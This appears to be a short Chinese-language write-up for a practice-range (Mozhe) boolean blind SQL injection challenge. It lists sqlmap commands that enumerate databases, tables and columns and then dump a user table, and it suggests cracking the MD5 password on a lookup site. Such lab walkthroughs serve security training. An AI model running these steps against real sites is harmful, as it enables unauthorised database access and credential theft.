在线靶场-墨者-SQL注入1星-SQL注入漏洞测试(布尔盲注)

解题方法:
运用sqlmap工具对数据库进行爆破
1.判断注入点存在:python sqlmap.py -u “ip”
2.判断数据库名称:python sqlmap.py -u “ip”–dbs
3.判断web当前使用的数据库:python sqlmap.py -u “ip”–current-dbs
4.判断web当前使用的数据表:python sqlmap.py -u “ip”-D database --tables
5.判断表中字段:python sqlmap.py -u “ip“-D dbs -T tables --columns
6.数据爆破:python sqlmap.py -u “ip“-D tourdata -T userb -C “a,b,c” --dump
在线靶场-墨者-SQL注入1星-SQL注入漏洞测试(布尔盲注)_第1张图片
得到用户名和密码,去百度寻找MD5解密,解码后得到密码在靶场网页登录得到key
MD5网页:https://www.cmd5.com/

你可能感兴趣的:(在线靶场-墨者题目)